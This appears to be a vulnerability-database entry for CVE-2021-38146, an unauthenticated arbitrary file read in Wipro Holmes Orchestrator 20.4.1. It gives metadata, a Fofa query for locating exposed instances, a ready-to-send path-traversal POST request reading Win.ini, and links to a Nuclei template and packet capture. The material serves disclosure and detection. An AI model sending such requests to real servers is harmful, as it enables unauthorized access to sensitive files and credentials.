| Title | Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download |
|---|---|
| Author | s4e-io |
| Severity | High |
| Impact | Unauthenticated attackers can read arbitrary files from the server via path traversal in the SearchString parameter, potentially exposing sensitive configuration files, credentials, and proprietary data. |
| Remediation | Fixed In v21.4.0 |
| CVSS Score | 7.5 |
| EPSS Score | 0.45088 |
| CVE ID | CVE-2021-38146 |
| CWE ID | CWE-22 |
| Fofa Query | title="Wipro Holmes Orchestrator" |
| Tags | cve cve2021 wipro holmes lfi vuln |
The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
POST /home/download HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Connection: close
Content-Length: 60
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip
{
"SearchString": "C:/Windows/Win.ini",
"Msg": ""
}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-38146.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-38146.pcap
N/AN/A